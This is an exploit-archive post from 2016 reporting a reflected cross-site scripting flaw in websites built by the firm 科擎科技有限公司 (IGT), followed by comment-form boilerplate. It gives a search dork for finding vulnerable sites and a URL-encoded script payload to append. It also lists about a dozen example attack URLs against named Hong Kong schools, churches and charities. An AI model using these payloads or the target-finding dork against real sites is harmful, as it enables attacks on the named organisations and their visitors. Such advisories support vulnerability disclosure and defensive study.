科擎科技有限公司 (IGT) Cross Site Scripting

2016.01.15

Credit: modiret

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
|----------------------In The Name Of God------------------------|
|[+] Exploit Title: 科擎科技有限公司 (IGT) Cross Site Scripting
|[+]
|[+] Exploit Author: modiret
|[+]
|[+] Vendor Homepage: http://www.igears.net/
|[+]
|[+] Google Dork: intext:"網頁設計及維護 科擎科技有限公司" news_detail
|[+]
|[+] Tested on: Win 10 / Mozilla Firefox
|[+]
|[+] Date: 2016 14 January
|[+]
|--------------------------------------------------------------|
|[+] Exploit:
|[+] Search dork and choose a target and add "%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28976432%29%3c%2fScRiPt%3e" after URL!
|[+] To see Vulnerability!
|--------------------------------------------------------------|
|[+] Examples :
|[+]
|[+] http://www.choiming.edu.hk/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28972209%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.gracefield.edu.hk/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hkgamblers-recovery.org/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hkecss.org/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28947945%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.ssbc.org.hk/news_detail.php/%F6%22%20onmouseover=prompt%28996751%29%20
|[+]
|[+] http://www.xiyaosswkg.edu.hk/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.taktinur.edu.hk/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28915202%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.reconnect.hk/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28903527%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.ccchhktc.com/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28976432%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.community-hkecss.org/news_detail.php?pkey=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28976432%29%3C%2fScRiPt%3E
|[+]
|[+] http://www.yuenlongchurch.org/news_detail.php?p=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28922014%29%3c%2fScRiPt%3e
|[+]
|[+] http://www.hknlc.org/news_detail.php?pkey=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28984260%29%3c%2fScRiPt%3e
|[+]
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

科擎科技有限公司 (IGT) Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.